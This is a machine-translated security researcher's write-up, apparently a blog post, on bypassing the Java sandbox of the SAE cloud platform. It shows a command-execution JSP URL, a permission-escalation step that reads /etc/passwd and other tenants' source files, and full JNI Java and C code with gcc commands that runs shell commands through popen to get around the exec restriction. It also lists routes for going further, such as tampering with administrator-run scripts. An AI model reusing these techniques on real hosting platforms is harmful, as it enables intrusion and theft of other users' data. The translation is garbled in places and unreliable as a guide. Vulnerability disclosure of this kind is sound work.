Summary
Thank you for your support. after hard work, the author has reached the third level, which is called "command execution ". I don't know whether the author's description is clear or the SAE's understanding is biased. We didn't directly communicate with each other. I just wrote an article and handed it over to the other side for "Review" first ", it was published only after the review was passed. All communication is limited to the article itself. This communication obstacle is the beginning of this security defense bypass. In the second article of the author's article SAE Cloud Service Security Sandbox Bypass 2 (using crackClassLoader) (http://www.inbreak.net/archives/411), the example of using crackClassLoader to bypass java security sandbox is mentioned, at the end of this article, the author ends with a successful command execution and uses the cat command to display the homepage of other cloud users.
Body
SAE saw the importance of disabling command execution. At the beginning of this article, check the SAE environment and restrictions.
Upload a command execution JSP page and open:
Http://1.cracksae.sinaapp.com/cmd.jsp? Cmd = id
Return Value:
This error message is totally different from the permission exception information of the original JAVA sandbox. It is not a standard permission exception caused by the java standard sandbox, it must be different from the standard sandbox.
According to the error message, the saerestricts the execution of the runtime.exe c function (including processBuilder. start ). Note that the limitations are imposed on this function. According to the previous ideas, the author wants to do so, of course, by bypassing this function. This is also true for SAES. However, there are deviations between SAES developers and the details they understand. In the previous article, the author sent a message to SAES, stating that the SAES sandbox environment is bypassed. Note that this is the JAVA sandbox environment of SAES. The original intention of this article is to do a lot of things after bypassing the sandbox, and executing cmd is just one of them. SAE understands that preventing malicious users from executing cmd commands can prevent bypassing and fainting.
The author believes that SAE is cloud, cloud security needs to be protected, and user data. As for whether to execute commands, it is actually secondary. Standing on the cloud security standpoint, the author believes that hackers in the web Age are responsible for executing system commands. In the cloud era, what everyone wants to do is to at least extract the data of cloud users.
For example, you can read any file:
For normal file operations, the sandbox error message is displayed before the bypass operation is performed. If the developer and the author speculate that they are consistent and only impose restrictions on exec, they may not have the original sandbox policy and only prohibit the exec function to execute commands, this is equivalent to modifying the JRE environment.
BYPASS sandbox
This time for the convenience of use, the author of the article "SAE Cloud Service Security Sandbox Bypass 2 (using crackClassLoader)" (http://www.inbreak.net/archives/411) in the setPolicy code, separately pulled out and written. In the web application environment, permission settings are for all the classes in the current web application, so as long as the AllPermissions policy is successfully set, the subsequent file operations will not be limited.
The first step is to execute the setPolicy code. As mentioned in the previous article in the code, I will not mention it here. In the ExpPermissions2 class, I only wrote a JSP to directly call and escalate permissions.
After the permission is raised, a file browser can be directly displayed:
This shows that SAE is truly consistent with the author's speculation. It only limits the EXEC command execution, which is equivalent to no limit for the cloud.
Is to read/etc/passwd content, further column directory, you can read the user's data in the user's directory. From here, we can manage files of other cloud users.
Http://1.bypass3.sinaapp.com/bypass3forfile.jsp? Action = fileread & filename =/data1/jetty_work/201/user/jetty-0.0.0.0-balabalaXXXXXOOOOOs.war-_ blank webrss-any-/webapp/do. jsp
Access the URL above to read the source code of the do. jsp page of the cloud user "a user:
In fact, bypass has already been used for defense, but for technical research and reminding SAE not to do this solution, the author has done another thing. The saedeveloper recognizes that the system commands cannot be executed after the runtime.exe c () function is restricted. But is that true?
Command Execution
Java can call the dynamic library of C language. After loading in, it is equivalent to directly using the C language code. SAE only limits exec. The idea of bypass is to call the dynamic library of C language.
First, you need a java file:
Package net. inbreak;
Public class Loadlab {
Static {
Try {
System. load ("/root/o/libLoadlab. so ");
} Catch (UnsatisfiedLinkError e ){
System. err. println ("Cannot load command library: \ n" + e. toString ());
}
}
Public Loadlab (){
}
Public native String SayHello (String cmd );
} The file is loaded with/root/o/libLoadlab. so. Here, you need to change it to the absolute address of the web directory on SAE, and use "" To get it on jsp.
Then generate the jni header file
Run
Javah-jni net. inbreak. Loadlab generates "net_inbreak_Loadlab.h"
/* Do not edit this file-it is machine generated */
# Include <jni. h>
/* Header for class net_inbreak_Loadlab */
# Ifndef _ Included_net_inbreak_Loadlab
# Define _ Included_net_inbreak_Loadlab
# Ifdef _ cplusplus
Extern "C "{
# Endif
/*
* Class: net_inbreak_Loadlab
* Method: SayHello
* Signature: (Ljava/lang/String;) Ljava/lang/String;
*/
JNIEXPORT jstring JNICALL Java_net_inbreak_Loadlab_SayHello
(JNIEnv *, jobject, jstring );
# Ifdef _ cplusplus
}
# Endif
# Endif write the c code implementation function based on this file to execute the system command:
# Include <stdio. h>
# Include <stdlib. h>
# Include <string. h>
# Include "net_inbreak_Loadlab.h"
# Define BUFSIZE 1000
JNIEXPORT jstring JNICALL Java_net_inbreak_Loadlab_SayHello (JNIEnv * env, jobject arg, jstring instring)
{
Const char * cmd = (* env)-> GetStringUTFChars (env, instring, 0 );
/* Char buf [1024];
FILE * pp;
Char * returnchar = (char *) malloc (10 );
If (pp = popen (cmd, "r") = NULL)
{
Printf ("popen () error! \ N ");
Exit (1 );
}
While (fgets (buf, sizeof buf, pp ))
{
Char * ch = (char *) buf;
Strcat (returnchar, ch );
}
Char * bufc = (char *) malloc (10 );
Strcpy (bufc, returnchar );
Instring = (* env)-> NewStringUTF (env, bufc );
Pclose (pp );
// Convert
*/
FILE * fp;
Char buf;
Char bufreturn [65535];
If (fp = popen (cmd, "r") = NULL)
Return instring;
Int j = 0;
While (buf = fgetc (fp ))! = EOF)
{
// Memcpy (bufreturn, buf, strlen (buf ));
Bufreturn [j] = buf;
J ++;
}
Pclose (fp );
Char * chreturn = (char *) bufreturn;
Instring = (* env)-> NewStringUTF (env, chreturn );
Return instring;
}
Int main (int argc, char * argv []) {return 0;} This section of c code calls the popen function, executes system commands, and returns a jstring to JAVA.
The final result is the same as calling runtime.exe c.
Generate command:
Gcc-I/usr/java/jdk1.6.0 _ 33/include-I/usr/java/jdk1.6.0 _ 33/include/linux-fPIC-c net_inbreak_Loadlab.c then
Gcc-shared-Wl,-soname, libLoadlab. so.1-o libLoadlab. so net_inbreak_Loadlab.o generates the libLoadlab. so file.
This file should be put into the SAE web directory and loaded in Loadlab. java.
Write java code to call and test:
Public class Setp {
Public static void main (String [] args)
{
String name = "java. library. path ";
System. out. println (System. getProperty (name ));
Net. inbreak. Loadlab l = new net. inbreak. Loadlab ();
System. out. println ("haha:" + l. SayHello ("ifconfig "));
}
}
Www.2cto.com
The local call test is successful.
However, the failure on SAES will not be captured. The reason is that (read ifconfig and other files) is that the JAVA account on the linux level does not have the permission to execute system commands, this is the most embarrassing Command Execution Plan. In any case, users are not allowed to execute system commands. One reason the author wrote this JNI-related article is to record it, take a note, and may be used later. Another reason is that it is worried that SAE has developed a non-mainstream solution, leading to bypassing, we recommend that you disable crackClassLoader at least.
There are three ways to execute the command:
1. Elevation of Privilege.
As a matter of fact, this article has proved that you can read any files on the cloud. elevation of permission may cause unknown system errors. After all, it is not a zombie and worries about affecting online servers of SAE, the author did not proceed.
2. Write files in special locations.
In Linux, there are always a few sh files that the Administrator occasionally runs. We can modify the content to achieve the ultimate goal, but in this way, we are already biased towards the Penetration Route, the author's goal is cloud sandbox, not penetration, so it stops.
3. Replace the SAE code for security verification.
This can be done now, but it is the solution that the author remembered only when writing an article. I have already fixed the issue. The author has already completed the fourth round. In the face of numerous restrictions, I have no chance to do it before I break through it. The author does not know if he can PASS the fourth level of metamorphosis level, but he must try it.
Summary
Cloud security is mainly used to protect user data. As for command execution or anything, it is only a means to obtain user data, including Sandbox bypass. This time, SAE was BYPASS, because I did not understand what I really want to protect, I did not grasp the pulse of security at the macro level. I only made a technical confrontation against the author's article from a technical perspective.
For a person like the author, if the purpose is to damage, it will directly do bad things. Why should I write an article and send it to SAE? We recommend that you try to learn about google in the sandbox and disable the permissions you shouldn't have. Finally, the title of this article is "SAE Cloud Service Security Sandbox bypassing 3 (bypassing Command Execution defense)". In fact, this article does not bypass "command execution defense" from start to end. but since SAE made a mistake here, it is called this question.
By empty prodigal heart http://www.inbreak.net/Weibo http://t.qq.com/javasecurity